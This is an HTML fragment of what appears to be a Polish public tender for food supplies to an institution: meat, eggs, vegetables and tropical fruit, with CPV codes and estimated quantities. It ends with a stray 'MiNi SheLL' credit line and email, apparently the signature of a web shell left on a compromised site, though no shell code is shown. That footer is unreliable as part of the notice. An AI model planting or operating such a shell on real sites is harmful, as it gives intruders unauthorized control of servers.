19.	Schab pieczony					CPV 15131130-5	13 kg
20.	Schab wieprzowy bez kości, świeży, 
zapach charakterystyczny dla mięsa świeżego 	CPV 15113000-3	288 kg
21.	Serdelki drobiowe					CPV 15131130-5	29 kg
22.	Serdelki indycze					CPV 15131130-5	2,3 kg
23.	Szynka drobiowa					CPV 15131135-0	12,8 kg
24.	Szynka wieprzowa					CPV 15131130-5	5 kg
25.	Wątroba wieprzowa, świeża, 
zapach charakterystyczny dla mięsa świeżego 	CPV15131400-9	9 kg
26.	Żeberka wieprzowe extra świeże, 
zapach charakterystyczny dla mięsa świeżego 	CPV 15113000-3	375 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 11.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Produkty zwierzęce i podobne - jaja kurze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp. Nazwa produktu					Kod CPV	Ilość szacunkowa
1. Jaja kurze klasa świeżości A, kat. wagowa L = 70g,
jaja w wytłaczankach					 CPV 03142500-3	4190 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 11.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Warzywa, owoce i orzechy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp. Nazwa produktu					Kod CPV	Ilość szacunkowa
1.	Buraki ćwikłowe					CPV 03221111-7	132 kg
2.	Cebula 						CPV 03221113-1	351 kg
3.	Fasola biała średnia				CPV 03221210-1	114 kg
4.	Groch łuskany łupany				CPV 15331133-8	14 kg
5.	Gruszki 						CPV 03222322-6	50 kg
6.	Jabłka deserowe średniej wielkości		CPV 03222321-9	51 kg
7.	Jabłka do smażenia średniej wielkości 	CPV 03222321-9	476 kg
8.	Kalafior świeży główka				CPV 03221420-6	19 szt.
9.	Kapusta biała kwaszona op. 500 g		CPV 15331142-4	17 szt.
10.	Kapusta biała kwaszona wiadro op.10 kg  	CPV 15331142-4	76 szt.
11.	Kapusta pekińska zafoliowana			CPV 03221410-3	29 szt.
12.	Kapusta biała świeża					CPV 03221410-3	53 kg
13.	Koper zielony, świeży op. pęczek		CPV 03221000-6	45szt
14.	Marchew 						CPV 03221112-4	591 kg
15.	Ogórek świeży					CPV 03221270-9	63,5 kg
16.	Ogórek kwaszony  op.10 kg	wiadro	CPV 15331000-7	7 szt.
17.	Ogórek kwaszony op.400 g 			CPV 15331000-7	81 szt.
18.	Papryka czerwona świeża 				CPV 15331136-9	1,5 kg
19.	Pieczarki						CPV 03221260-6	101 kg
20.	Pietruszka korzeń					CPV 03221110-0	98,2 kg
21.	Pietruszka zielona natka, op. pęczek	CPV 03221000-6	37 szt.
22.	Pomidor świeży czerwony			CPV 03221240-0	46 kg
23.	Por świeży						CPV 03221000-6	179 szt.
24.	Sałata masłowa zielona świeża			CPV 03221310-2	7 szt.
25.	Seler korzeń						CPV 03221100-7	76 kg
26.	Szczypior świeży op. pęczek				CPV 03221000-6	40 szt.
27.	Śliwki 	odmiany Węgierka duża			CPV 03222334-3	50 kg
28.	Ziemniaki jadalne średniej wielkości		CPV 03212100-1	5515 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 11.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Owoce i orzechy tropikalne CPV - 03222100-4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp. Nazwa produktu					Kod CPV	Ilość szacunkowa
1.	Banany						CPV 03222111-4	60 kg
2.	Cytryna 						CPV 03222210-8	12 kg
3.	Mandarynki 						CPV 03222240-7	39,5 kg
4.	Owoce Kiwi - koszyczek 1kg			CPV 03222118-3	9 szt.
5.	Pomarańcze						CPV 03222220-1	21 kg
6.	Winogrona białe					CPV 03222340-8	20 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.21.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 11.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com